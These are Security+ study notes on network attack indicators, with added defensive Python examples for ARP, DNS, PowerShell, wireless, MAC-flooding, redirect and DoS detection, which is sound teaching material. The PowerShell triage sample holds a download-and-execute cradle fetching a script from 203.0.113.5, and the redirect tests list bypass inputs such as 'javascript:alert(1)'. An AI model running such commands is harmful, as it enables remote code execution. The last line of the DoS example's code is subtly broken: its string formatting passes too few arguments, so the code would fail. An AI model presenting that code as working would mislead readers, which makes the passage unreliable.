1.4 Given a scenario, analyze potential indicators associated with network attacks


Address Resolution Protocol (ARP) poisoning

ARP operates at Layer 2 of the OSI model and maps IP addresses to Media Access Control (MAC) addresses. ARP has no authentication, so an attacker on the same broadcast domain can send forged, unsolicited (gratuitous) ARP replies to the victim that bind the gateway's IP address to the attacker's MAC. ARP attacks must therefore be done locally; once the victim's cache is poisoned the attacker can intercept data frames, modify traffic, redirect the victim to a look-alike website (similar in effect to DNS poisoning), or stop all traffic. The exam-expected prevention is to insert static entries into the ARP cache with arp -s, which stops the entries being overwritten; on larger networks dynamic ARP inspection on switches and alerting on IP-to-MAC conflicts do the same job at scale.
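
The two indicators a defender looks for, an IP address claimed by more than one MAC and replies that no host asked for, as an added example (not part of the original study set). It runs on a constructed list of ARP frames rather than a live capture so it works offline; a sniffer such as tcpdump or scapy would supply the same five fields from a real network.

```python
"""Indicators of ARP poisoning from a list of ARP frames.

Added example, not part of the original study set. It runs on a small,
constructed list of ARP frames instead of a live capture so it works
offline; a sniffer such as tcpdump or scapy would supply the same fields
from a real network.
"""
from collections import defaultdict

# Constructed sample frames: (opcode, sender_mac, sender_ip, target_mac, target_ip).
# opcode 1 = request, 2 = reply.  The real gateway 192.168.1.1 is
# aa:aa:aa:aa:aa:01; the attacker cc:cc:cc:cc:cc:99 also claims that IP and
# then claims the victim's IP towards the gateway (classic two-way poisoning).
SAMPLE_FRAMES = [
    (1, "bb:bb:bb:bb:bb:02", "192.168.1.20", "00:00:00:00:00:00", "192.168.1.1"),
    (2, "aa:aa:aa:aa:aa:01", "192.168.1.1", "bb:bb:bb:bb:bb:02", "192.168.1.20"),
    (2, "cc:cc:cc:cc:cc:99", "192.168.1.1", "bb:bb:bb:bb:bb:02", "192.168.1.20"),
    (2, "cc:cc:cc:cc:cc:99", "192.168.1.1", "bb:bb:bb:bb:bb:02", "192.168.1.20"),
    (2, "cc:cc:cc:cc:cc:99", "192.168.1.20", "aa:aa:aa:aa:aa:01", "192.168.1.1"),
]


def analyze_arp(frames):
    """Return IPs claimed by more than one MAC and replies nobody asked for."""
    claims = defaultdict(set)   # ip -> every MAC that has claimed it
    pending = set()             # (asker_ip, asked_ip) requests still awaiting a reply
    unsolicited = []            # (sender_mac, sender_ip, target_ip)
    for opcode, smac, sip, _tmac, tip in frames:
        if opcode == 1:
            pending.add((sip, tip))
            continue
        claims[sip].add(smac)
        # A reply is legitimate only if the target recently asked about sender_ip.
        if (tip, sip) in pending:
            pending.discard((tip, sip))
        else:
            unsolicited.append((smac, sip, tip))
    conflicts = {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}
    return {"conflicts": conflicts, "unsolicited": unsolicited}


def static_arp_commands(trusted):
    """Build the 'arp -s' commands that pin trusted IP->MAC bindings (the card's control)."""
    return ["arp -s %s %s" % (ip, mac) for ip, mac in sorted(trusted.items())]


if __name__ == "__main__":
    report = analyze_arp(SAMPLE_FRAMES)
    for ip, macs in report["conflicts"].items():
        print("CONFLICT: %s claimed by %s" % (ip, ", ".join(macs)))
    for smac, sip, tip in report["unsolicited"]:
        print("UNSOLICITED reply from %s: %s is-at %s, sent to %s" % (smac, sip, smac, tip))
    print("\n".join(static_arp_commands({"192.168.1.1": "aa:aa:aa:aa:aa:01"})))
```

Note that gratuitous ARP is also used legitimately (for example by hosts announcing themselves after boot or by failover clusters), so the conflict check is the stronger signal; the unsolicited-reply count is useful mainly when it spikes from one MAC.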

Bash (malicious code or script execution)

Bourne Again Shell. On Linux, Bash is the shell used to run commands, execute programs, and automate tasks with scripts, which also makes it a vehicle for malicious scripts. Shellshock (CVE-2014-6271, 2014) was a Bash vulnerability in the way it parsed function definitions in environment variables; it let remote attackers run commands on many web servers, typically through CGI scripts that passed request headers to Bash.

Domain Reputation

Companies have to be careful about the reputation of their email and web services. Email reputation is based on the kind of email an organization sends and on how recipients react to it in their mail clients. If many recipients mark a company's messages as spam, that damages the company's reputation and its ability to deliver mail at all. A common cause is malware on an internal machine sending spam through the company's own email server: recipients click the "This is spam" button in their mail client, and as receiving providers accumulate those reports they start limiting or blocking all mail from that server. Many websites check and continuously monitor the reputation of an email server's IP address so that such problems can be stopped before they become significant.

The reputation of web servers matters as well. If an attacker puts malware on a web server, the major search engines will index the site and identify the malware; from then on, anyone who visits the website gets a full-page red warning that the site ahead contains malware and is not safe, until the malware is removed and the site is re-reviewed.

jamming (wireless attacks)

A form of denial of service that targets the radio spectrum: the attacker transmits noise or junk frames on the channel so that legitimate clients cannot communicate with the wireless AP. As with other DoS attacks, jamming is often a stepping stone rather than the goal; clients knocked off the legitimate AP may reconnect to an attacker's rogue or evil-twin AP.

MAC cloning

Changing a device's MAC address to match that of another device so the network treats it as that device. It is used to bypass MAC address filtering on a switch or wireless network, or to hijack the access of a device that has already authenticated to a captive portal, since the portal usually tracks authorization by MAC address.

Macros (malicious code or script execution)

Macros are disabled by default in Microsoft Office. A macro is a series of actions you want to carry out, normally in Word or Excel, written in Microsoft's Visual Basic for Applications (VBA) scripting language. Malicious macros are typically delivered through phishing emails; beware of attachments described as confidential information or as invoices for purchases you do not recognize, especially if they ask you to click "Enable Content". A good anti-virus can block known malicious macros, and a policy that blocks macros in files downloaded from the internet removes most of the risk.

disassociation (wireless attacks)

A type of DoS attack in which the attacker sends a spoofed deauthentication or disassociation management frame, apparently from the access point, to a wireless client so that its connection to the WAP drops. These management frames are unauthenticated in basic 802.11, so they are trivial to forge; 802.11w (Protected Management Frames) defeats the attack. It is often used to force clients onto an evil twin or to capture the WPA2 handshake when they reconnect.

Bluesnarfing (wireless attacks)

An attack in which the attacker connects to a Bluetooth device without the owner's knowledge and extracts data from it, such as contact details, calendar entries, messages, and other sensitive information.

PowerShell (malicious code or script execution)

Windows scripting language and shell used to perform administrative tasks. PowerShell has many modules that can be used for remote access and that are equally useful to attackers, and attacks abusing it have been increasing. It has been used for: injecting malware directly into memory (fileless attacks); being launched from malicious Office macros; lateral movement (for example through PowerShell remoting). Typical indicators are encoded commands, hidden windows, execution-policy bypasses, and download-and-execute one-liners.
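
The indicators listed above turned into triage logic, as an added example (not part of the original study set). The input is a constructed list of CommandLine values like those recorded by Sysmon event 1 or Windows event 4688; the encoded payload is built here with the same UTF-16LE plus base64 encoding that powershell.exe -EncodedCommand expects, so the decoder can be checked end to end.

```python
"""Triage PowerShell command lines for common attack indicators.

Added example, not from the original study set. Input is a constructed
list of CommandLine values such as Sysmon event 1 or Windows event 4688
would record; the encoded payload is built here with the same UTF-16LE +
base64 encoding that powershell.exe -EncodedCommand expects.
"""
import base64
import re


def encode_command(script):
    """Encode a script the way -EncodedCommand expects (used only to build sample data)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation command lines.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    "powershell.exe -nop -w hidden -enc "
    + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"),
    "powershell.exe -Command Get-Service -Name Spooler",
    "cmd.exe /c powershell -ep bypass -c \"IEX ([Text.Encoding]::UTF8.GetString("
    "[Convert]::FromBase64String('d2hvYW1p')))\"",
]

# -EncodedCommand and the abbreviations PowerShell accepts, followed by base64.
ENCODED_RE = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

EVASION = {
    "hidden window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "no profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "execution policy bypass": re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass"),
}
PAYLOAD = {
    "download cradle": re.compile(r"(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b"),
    "in-memory execution": re.compile(r"(?i)\bIEX\b|Invoke-Expression|FromBase64String|Reflection\.Assembly"),
}


def triage(cmdline):
    """Return the indicators found, the decoded payload (if any) and a severity."""
    indicators, decoded = [], None
    text = cmdline
    match = ENCODED_RE.search(cmdline)
    if match:
        indicators.append("encoded command")
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
            text = cmdline + " " + decoded   # scan the decoded script as well
        except (ValueError, UnicodeDecodeError):
            indicators.append("undecodable encoded payload")
    evasion = [name for name, rx in EVASION.items() if rx.search(text)]
    payload = [name for name, rx in PAYLOAD.items() if rx.search(text)]
    indicators += evasion + payload
    if payload and (evasion or decoded is not None):
        severity = "high"        # hiding plus a payload: almost never legitimate
    elif payload or len(evasion) >= 2:
        severity = "medium"
    elif indicators:
        severity = "low"         # a single flag such as -NoProfile is normal in admin scripts
    else:
        severity = "none"
    return {"indicators": indicators, "decoded": decoded, "severity": severity}


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        result = triage(line)
        print("%-6s %s" % (result["severity"], ", ".join(result["indicators"]) or "-"))
        if result["decoded"]:
            print("       decoded: " + result["decoded"])
```

Decoding the payload matters more than the flags: -NoProfile alone appears in countless legitimate scheduled tasks, so the severity only climbs when evasion flags and a download or in-memory execution pattern occur together.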

Operational technology (OT) (DDoS)

Operational technology (OT) is the hardware and software that monitors and controls physical devices and processes, such as industrial control systems, building automation, and video surveillance. In the past these devices worked in an air-gapped environment (for example analogue CCTV), but interconnected video surveillance and control solutions are now common and are being targeted by DDoS attacks so that they fail and leave the company vulnerable. Poorly secured OT and IoT devices are also recruited into the botnets that launch those attacks.

On-path attack(previously known as man-in-the-middle attack/man-in-the-browser-attack)

Interception attacks in which the attacker places themselves between two communicating entities, normally a web browser and a web server, and reads or modifies the communications in order to collect information or impersonate one side.

A man-in-the-middle (MITM) attack is where the attacker intercepts traffic passing between two hosts and changes the information in the packets in real time. For example, an attacker relays the conversation between two parties so that each believes they are talking directly to the other while the attacker diverts funds. In the key-exchange variant, the attacker intercepts each side's public key and substitutes their own, so both parties encrypt to the attacker while believing they are talking to each other in a secure environment.

A man-in-the-browser attack is where a malicious plugin or script has been downloaded and the browser itself has been compromised. It acts like a Trojan: the next time you carry out online banking it steals your banking details or alters the transaction, and because the tampering happens inside the browser, TLS does not protect against it.

Near Field Communication (NFC) (wireless attacks)

Normally used to make a contactless payment; the card must be within about 4 cm of the card reader. Because an NFC card answers any reader that comes into range, you should store an NFC-enabled card inside an aluminium (RFID-blocking) pouch to prevent someone standing close to you from reading or skimming it.

Python (malicious code or script execution)

Powerful, widely available scripting language used by system and website administrators. Because an interpreter is present on most servers, attackers use Python scripts to install backdoors, open reverse shells, and automate attacks; an unexpected Python process making outbound connections is a common indicator.

DNS poisoning

Inserting forged entries into a DNS cache (on a resolver or a client) so that requests for a legitimate domain are diverted to a fraudulent website that has been made to look like the legitimate one. A resolver defends itself by accepting only replies whose transaction ID, destination port, and question section match an outstanding query, and by caching only records within the zone it asked about.
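
The resolver-side checks described above, as an added example (not part of the original study set). Responses are represented as plain dicts rather than wire-format packets so the logic stays readable; the outstanding query, the genuine response and the forged response are all constructed.

```python
"""Resolver-side checks that defeat most cache-poisoning attempts.

Added example, not part of the original study set. Responses are
represented as plain dicts rather than wire-format packets so the logic is
easy to follow; the outstanding query and both responses are constructed.
"""

# What the resolver remembers about a query it sent (constructed).
OUTSTANDING = {
    "txid": 0x1A2B,            # random 16-bit transaction ID
    "sport": 40001,            # random source port the query left from
    "qname": "www.example.com.",
    "qtype": "A",
    "zone": "example.com.",    # the zone the queried server is authoritative for
}

# Constructed response from the authoritative server.
GOOD_RESPONSE = {
    "txid": 0x1A2B, "dport": 40001, "qname": "www.example.com.", "qtype": "A",
    "records": [
        {"name": "www.example.com.", "type": "A", "data": "192.0.2.10"},
        {"name": "example.com.", "type": "NS", "data": "ns1.example.com."},
        {"name": "ns1.example.com.", "type": "A", "data": "192.0.2.53"},
        # an "additional" record this server has no business answering for
        {"name": "www.bank.example.", "type": "A", "data": "203.0.113.9"},
    ],
}

# Constructed forged reply: right question, guessed (wrong) transaction ID.
SPOOFED_RESPONSE = {
    "txid": 0x1A2C, "dport": 40001, "qname": "www.example.com.", "qtype": "A",
    "records": [{"name": "www.example.com.", "type": "A", "data": "203.0.113.9"}],
}


def _fqdn(name):
    """Normalise a name for comparison: lower-case, exactly one trailing dot."""
    return name.lower().rstrip(".") + "."


def in_bailiwick(name, zone):
    """True if `name` is `zone` or lies below it."""
    name, zone = _fqdn(name), _fqdn(zone)
    return name == zone or name.endswith("." + zone)


def validate_response(outstanding, response):
    """Return (records_to_cache, reason). Everything a poisoner has to guess is checked."""
    if response["txid"] != outstanding["txid"]:
        return [], "transaction ID mismatch"
    if response["dport"] != outstanding["sport"]:
        return [], "destination port does not match the query's source port"
    asked = (_fqdn(outstanding["qname"]), outstanding["qtype"])
    if (_fqdn(response["qname"]), response["qtype"]) != asked:
        return [], "question section does not match the query"
    # Only cache records the responding server is authoritative for.
    cacheable = [rr for rr in response["records"]
                 if in_bailiwick(rr["name"], outstanding["zone"])]
    return cacheable, "ok"


if __name__ == "__main__":
    for label, resp in (("genuine", GOOD_RESPONSE), ("spoofed", SPOOFED_RESPONSE)):
        records, reason = validate_response(OUTSTANDING, resp)
        print("%s: %s, %d record(s) cached" % (label, reason, len(records)))
```

The transaction ID and source port together give an attacker roughly 32 bits to guess per forged reply; the bailiwick check is what stops a server for one domain from planting records for another, which is how the classic Kaminsky-style poisoning worked once the guess succeeded.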

Initialization Vector (IV) (wireless attacks)

A value supplied alongside the key to an encryption algorithm so that encrypting the same data twice does not produce the same ciphertext. It is not itself a secret key, but it must not repeat: used this way it is called a nonce, employed only once under a given key. The IV is usually the same length as the cipher's block size and is sometimes known as the starter variable. The wireless attack the term refers to is against WEP, whose 24-bit IV was so short that IVs repeated after a few thousand frames on a busy network, letting an attacker recover the key by collecting enough traffic.

Visual Basic for Applications (VBA)

Refers to a programming language used to create macros. It is a descendant of the BASIC programming language and is built into all Office products as well as some other software. Malicious VBA macros embedded in Office documents are a common phishing payload.

Radio Frequency Identification (RFID)

Uses electromagnetic fields to read data stored in a tag, allowing assets to be identified and tracked. It is commonly used in shops, where tags attached to high-value goods set off an alarm if the item leaves the store. Because a tag answers any reader in range, tags can be read or cloned from a distance, which is the basis of RFID attacks.

Domain Hijacking

When an attacker changes the registration of a domain with the registrar so that they control it, usually for profit. For example, an attacker manages to re-register the domain name of a well-known company (often by compromising the registrar account or stealing the registrant's credentials) and gains access to the company's control panel at its hosting provider, Hosting A. They then buy a hosting package with Hosting B, copy all of the files from Hosting A over to Hosting B, and point the domain's DNS records at Hosting B, where they take sales from customers who believe they are trading with the original company. Registrar locks and multi-factor authentication on the registrar account are the main defences.

Evil twin (wireless attacks)

When another WAP (wireless access point) is set up with the same SSID as the legitimate WAP so that it looks identical, but with no security. It is designed to lure you into connecting so that your traffic can be captured; because clients auto-join by SSID, attackers often pair it with a deauthentication attack to push users over to it.
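
Detection logic for the disassociation and evil twin cards above, as an added example (not part of the original study set). The frames are a constructed, simplified summary of what a monitor-mode capture would show (timestamp, frame subtype, transmitter BSSID, receiver, SSID, and whether an RSN/WPA element was present); airodump-ng or scapy would supply the same fields from a real capture. The set of BSSIDs the organization owns is also constructed.

```python
"""Evil-twin and deauthentication-flood indicators from 802.11 management frames.

Added example, not part of the original study set. The frames are a
constructed summary of a monitor-mode capture: (timestamp, subtype,
transmitter BSSID, receiver, SSID, RSN element present).
"""
from collections import defaultdict, deque

# BSSIDs the organisation actually owns (constructed).
KNOWN_BSSIDS = {"aa:aa:aa:aa:aa:01", "aa:aa:aa:aa:aa:02", "aa:aa:aa:aa:aa:03"}

# Constructed frames: (t_seconds, subtype, transmitter, receiver, ssid, rsn_present)
SAMPLE_FRAMES = [
    (0.0, "beacon", "aa:aa:aa:aa:aa:01", "ff:ff:ff:ff:ff:ff", "CorpWiFi", True),
    (0.1, "beacon", "aa:aa:aa:aa:aa:02", "ff:ff:ff:ff:ff:ff", "CorpWiFi", True),
    (0.2, "beacon", "aa:aa:aa:aa:aa:03", "ff:ff:ff:ff:ff:ff", "Guest", False),
    (0.3, "beacon", "de:ad:be:ef:00:01", "ff:ff:ff:ff:ff:ff", "CorpWiFi", False),
    (50.0, "deauth", "aa:aa:aa:aa:aa:02", "bb:bb:bb:bb:bb:10", None, None),
] + [
    # eight broadcast deauths "from" the real AP in under two seconds
    (100.0 + i * 0.2, "deauth", "aa:aa:aa:aa:aa:01", "ff:ff:ff:ff:ff:ff", None, None)
    for i in range(8)
]


def find_evil_twins(frames, known_bssids):
    """Flag beacons for our SSIDs that come from BSSIDs we do not own."""
    by_ssid = defaultdict(dict)  # ssid -> {bssid: rsn_present}
    for _t, subtype, src, _dst, ssid, rsn in frames:
        if subtype == "beacon":
            by_ssid[ssid][src] = rsn
    suspects = []
    for ssid, aps in sorted(by_ssid.items()):
        if not any(bssid in known_bssids for bssid in aps):
            continue  # somebody else's network, not an impersonation of ours
        for bssid, rsn in aps.items():
            if bssid in known_bssids:
                continue
            if not rsn and any(aps.values()):
                reason = "open network impersonating a secured SSID"
            else:
                reason = "unknown BSSID advertising our SSID"
            suspects.append((ssid, bssid, reason))
    return suspects


def detect_deauth_flood(frames, window=10.0, threshold=5):
    """Return {transmitter: peak count} for senders exceeding `threshold` deauths per `window` s."""
    recent = defaultdict(deque)
    flagged = {}
    for t, subtype, src, _dst, _ssid, _rsn in sorted(frames, key=lambda f: f[0]):
        if subtype != "deauth":
            continue
        q = recent[src]
        q.append(t)
        while t - q[0] > window:       # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            flagged[src] = max(flagged.get(src, 0), len(q))
    return flagged


if __name__ == "__main__":
    for ssid, bssid, reason in find_evil_twins(SAMPLE_FRAMES, KNOWN_BSSIDS):
        print("EVIL TWIN? %s from %s: %s" % (ssid, bssid, reason))
    for src, count in detect_deauth_flood(SAMPLE_FRAMES).items():
        print("DEAUTH FLOOD from %s: %d frames in window" % (src, count))
```

The deauth transmitter address is spoofed to the real AP's BSSID, so the flood shows up against your own AP; a single deauth is normal housekeeping, which is why the check is rate-based. Enabling 802.11w on the real APs makes the forged frames fail verification regardless of detection.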

Network (DDoS)

Where a botnet is set up to flood a victim's system or network link with an enormous volume of traffic (for example a SYN flood or a UDP amplification flood) so that it is taken down. A stateful firewall can be used to stop unsolicited traffic entering your network and to time out half-open sessions, but its own state table can be exhausted by a large flood, so volumetric attacks are normally absorbed upstream by the ISP or a DDoS scrubbing service.

rogue access point (wireless attacks)

Where an additional access point is connected to your corporate network without authorization, again usually with no security, so as to lure users into connecting to it (or simply installed by an employee for convenience, which exposes the network just the same). This can be prevented by installing 802.1X-managed switches, where every device connecting to the network must authenticate, and detected by wireless scans for BSSIDs you do not own.

Media access control (MAC) flooding

Where an attacker floods a switch with Ethernet frames carrying random source MAC addresses so that the switch's limited CAM (MAC address) table fills up. Once the table is full the switch can no longer learn new addresses and floods frames for unknown destinations out of every port like a hub, letting the attacker sniff traffic. It can be prevented with port security (limiting the number of MAC addresses per port) and by using 802.1X-managed switches with an AAA server.
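
The mechanism and the mitigation side by side, as an added example (not part of the original study set). The Switch class is a deliberately simplified model (a learning switch with a bounded CAM table and a per-port MAC limit, no ageing or VLANs) written to show why a full table turns the switch into a hub; the hosts, ports and MAC addresses are constructed.

```python
"""How MAC flooding defeats a switch, and how port security stops it.

Added example, not part of the original study set. The Switch class is a
simplified model (bounded CAM table, per-port MAC limit, no ageing or VLANs)
used only to show the mechanism; hosts, ports and MACs are constructed.
"""
from collections import defaultdict

HOST_A, HOST_B = "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:02"
PORT_A, PORT_B, PORT_ATTACKER = 1, 2, 3


class Switch:
    def __init__(self, cam_capacity, max_macs_per_port):
        self.cam = {}                       # learned source MAC -> port
        self.capacity = cam_capacity
        self.max_macs_per_port = max_macs_per_port
        self.macs_seen = defaultdict(set)   # port -> source MACs seen on it
        self.err_disabled = set()           # ports shut down by port security
        self.flooded = 0                    # frames sent out of every port

    def forward(self, ingress, src, dst):
        """Process one frame and report where it went."""
        if ingress in self.err_disabled:
            return "dropped"
        seen = self.macs_seen[ingress]
        if src not in seen and len(seen) >= self.max_macs_per_port:
            self.err_disabled.add(ingress)          # port-security violation
            return "err-disabled"
        seen.add(src)
        if src not in self.cam and len(self.cam) < self.capacity:
            self.cam[src] = ingress                 # learn the source address
        if dst in self.cam:
            return "port %d" % self.cam[dst]
        self.flooded += 1                           # unknown destination: behave like a hub
        return "flooded"


def simulate(max_macs_per_port, cam_capacity=64, attack_frames=200):
    """Attacker on port 3 floods bogus source MACs, then host A sends a unicast to host B."""
    sw = Switch(cam_capacity, max_macs_per_port)
    for i in range(attack_frames):
        bogus = "02:00:00:00:%02x:%02x" % (i // 256, i % 256)
        sw.forward(PORT_ATTACKER, bogus, "ff:ff:ff:ff:ff:ff")
    sw.forward(PORT_B, HOST_B, HOST_A)              # B speaks; can the switch still learn it?
    result = sw.forward(PORT_A, HOST_A, HOST_B)     # unicast A -> B: forwarded or flooded?
    return {"a_to_b": result, "cam_entries": len(sw.cam),
            "err_disabled": sorted(sw.err_disabled), "flooded_frames": sw.flooded}


if __name__ == "__main__":
    print("no port security :", simulate(max_macs_per_port=10**6))
    print("max 2 MACs/port  :", simulate(max_macs_per_port=2))
```

In the unprotected run the 64-entry table is entirely attacker addresses, so the later unicast from A to B is flooded to every port including the attacker's. With a limit of two MACs per port the attacker's port goes err-disabled on the third bogus address, B is learned normally, and the same frame goes only to port 2.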

Uniform Resource Locator (URL) redirection

Where an attacker redirects you from a legitimate website to a fraudulent one. Common routes are an unvalidated redirect parameter on the legitimate site (an open redirect, which lets a phishing link start on a trusted domain), or altering the site's DNS records after compromising the control panel for the domain. It can be prevented by validating redirect targets against an allow list, keeping your software up to date, using a web application firewall, or running an automated website scanner that finds such vulnerabilities.
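
A redirect-parameter check hardened against the usual open-redirect bypasses, as an added example (not part of the original study set). The allowed hosts and the inputs exercised in the test are constructed; the checks target the tricks attackers use against naive "starts with a slash" filters.

```python
"""Hardening a redirect parameter against open-redirect abuse.

Added example, not part of the original study set. The allowed hosts and
the test inputs are constructed; the checks cover the bypasses attackers
commonly try against naive "starts with /" filters.
"""
from urllib.parse import urlsplit

ALLOWED_HOSTS = frozenset({"www.example.com", "example.com"})


def safe_redirect_target(next_param, default="/", allowed_hosts=ALLOWED_HOSTS):
    """Return `next_param` if it stays on our site, otherwise `default`."""
    if not next_param:
        return default
    # Browsers strip leading/trailing whitespace and ignore tabs and newlines anywhere.
    candidate = "".join(ch for ch in next_param.strip() if ch not in "\t\r\n")
    # Browsers treat a backslash like a slash in URLs; urlsplit does not.
    candidate = candidate.replace("\\", "/")
    # "//evil.example" and "///evil.example" are both scheme-relative to a browser.
    if candidate.startswith("//"):
        return default
    parts = urlsplit(candidate)
    if parts.scheme:
        if parts.scheme.lower() not in ("http", "https"):
            return default                  # javascript:, data:, etc.
        if not parts.netloc:
            return default                  # "https:evil.example" is parsed differently by browsers
        # .hostname drops userinfo and port, so "www.example.com@evil.example" is caught
        if (parts.hostname or "").lower() not in allowed_hosts:
            return default
        return candidate
    if parts.netloc:
        return default
    if not candidate.startswith("/"):
        return default                      # only same-origin absolute paths are accepted
    return candidate


if __name__ == "__main__":
    for value in ["/account", "//evil.example/x", "/\\evil.example",
                  "https://www.example.com@evil.example/", "javascript:alert(1)"]:
        print("%-40r -> %r" % (value, safe_redirect_target(value)))
```

The simplest robust design is stricter still: accept only a relative path and never an absolute URL, or map an opaque token to a server-side table of destinations. The function above keeps absolute URLs for sites that genuinely need to bounce between their own hosts.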

bluejacking (wireless attacks)

Where an attacker sends unsolicited messages (such as vCards or text messages) to a nearby Bluetooth device; it is mostly a nuisance and does not itself give the attacker control. Taking control of a Bluetooth phone so as to make phone calls and send text messages is bluebugging.

Application (DDoS)

Where the DDoS floods a particular application rather than the network; the rate is measured in requests per second (rps). Specially crafted requests (for example slow HTTP requests or expensive searches) are sent so that the application cannot cope with the volume, often using far less bandwidth than a network-layer flood.

DOS attack vs DDOS attack

Where the victim's machine or network is flooded with a high volume of requests from another host so that it is unavailable to legitimate hosts. A common method is the SYN flood: the attacker sends the first part of the TCP three-way handshake (SYN), the victim replies with SYN-ACK and holds a half-open session waiting for an ACK that never comes, and the victim's connection backlog fills up. A DoS network attack comes from a single IP address, whereas a DDoS network attack comes from multiple IP addresses (usually a botnet), which makes it far harder to block by source.
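
Host-side indicators for the two cards above (application DDoS measured in rps, and DoS versus DDoS by source count), as an added example that is not part of the original study set. The connection-table lines mimic Linux `netstat -tan` output and the access-log lines mimic an Apache/nginx combined log; both are constructed.

```python
"""SYN-flood and request-rate indicators from host data.

Added example, not part of the original study set. The connection-table
lines mimic Linux `netstat -tan` output and the access-log lines mimic an
Apache/nginx combined log; both are constructed.
"""
import re
from collections import Counter

# Constructed `netstat -tan` style lines: many half-open (SYN_RECV) connections.
SINGLE_SOURCE_TABLE = [
    "tcp 0 0 10.0.0.5:443 198.51.100.7:%d SYN_RECV" % (40000 + i) for i in range(12)
] + [
    "tcp 0 0 10.0.0.5:443 203.0.113.21:51000 SYN_RECV",
    "tcp 0 0 10.0.0.5:443 203.0.113.22:51001 SYN_RECV",
    "tcp 0 0 10.0.0.5:443 192.0.2.9:33000 ESTABLISHED",
]
MANY_SOURCE_TABLE = [
    "tcp 0 0 10.0.0.5:443 198.51.100.%d:40000 SYN_RECV" % (10 + i) for i in range(12)
]

# Constructed access-log lines (combined format, abbreviated).
ACCESS_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=%s HTTP/1.1" 200 512' % i
    for i in range(6)
] + [
    '192.0.2.9 - - [10/Oct/2023:13:55:37 +0000] "GET / HTTP/1.1" 200 1024',
    '198.51.100.7 - - [10/Oct/2023:13:55:37 +0000] "GET /search?q=x HTTP/1.1" 200 512',
]


def half_open_by_source(netstat_lines):
    """Count SYN_RECV (half-open) connections per remote IP."""
    counts = Counter()
    for line in netstat_lines:
        fields = line.split()
        if len(fields) >= 6 and fields[5] == "SYN_RECV":
            remote_ip = fields[4].rsplit(":", 1)[0]
            counts[remote_ip] += 1
    return counts


def classify_syn_flood(counts, threshold=10, single_source_share=0.8):
    """Decide whether the half-open backlog looks like a DoS (one source) or a DDoS (many)."""
    total = sum(counts.values())
    if total < threshold:
        return "normal"
    top_ip, top = counts.most_common(1)[0]
    if top / total >= single_source_share:
        return "DoS from %s" % top_ip
    return "DDoS from %d sources" % len(counts)


# client IP, then the time-of-day part of the bracketed timestamp
LOG_RE = re.compile(r"^(\S+) \S+ \S+ \[[^:]+:(\d\d:\d\d:\d\d) ")


def peak_requests_per_second(log_lines):
    """Return (second, rps, top_ip) for the busiest second in the log."""
    per_second, per_ip = Counter(), Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            per_second[m.group(2)] += 1
            per_ip[m.group(1)] += 1
    second, rps = per_second.most_common(1)[0]
    return second, rps, per_ip.most_common(1)[0][0]


if __name__ == "__main__":
    print(classify_syn_flood(half_open_by_source(SINGLE_SOURCE_TABLE)))
    print(classify_syn_flood(half_open_by_source(MANY_SOURCE_TABLE)))
    print("peak %s rps at %s, busiest client %s" % peak_requests_per_second(ACCESS_LOG)[1::-1] + (peak_requests_per_second(ACCESS_LOG)[2],))
```

On a real host the same split drives the response: a single-source flood can be dropped at the firewall or by rate limiting that IP, whereas the many-source case needs SYN cookies on the server and upstream filtering, since blocking by source would mean blocking much of the internet.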

